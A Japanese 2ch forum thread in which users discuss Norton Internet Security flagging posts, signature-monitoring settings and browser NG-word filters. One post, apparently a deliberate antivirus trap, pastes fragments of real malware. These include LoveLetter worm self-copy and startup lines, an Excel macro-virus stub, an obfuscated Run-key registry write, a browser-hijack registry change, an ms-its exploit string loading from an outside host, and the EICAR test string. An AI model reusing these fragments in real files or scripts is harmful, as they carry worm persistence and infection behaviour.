NISだけの現象なら始めからこのスレにくることもなかったわけだが。。 まあとにかくNIS2004だと相変わらず反応するわけだ >>971 レスthx
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。 連投すまそ、
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz <body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
??? 今まで>>974みたいのを専ブラでNGワードに指定していたら、
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。 専ブラったっていろいろあるから
NGワードの処理の仕方も同じじゃない 専ブラは変えてないなら
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ) ごめん、シリア語ブラクラはノートンとは関係ないね。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。 t2.WriteLine('"Search Bar"="http://www.jethomepage.com/search.htm"');
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm"');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm"');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen." レス数が950を超えています。1000を超えると書き込みができなくなります。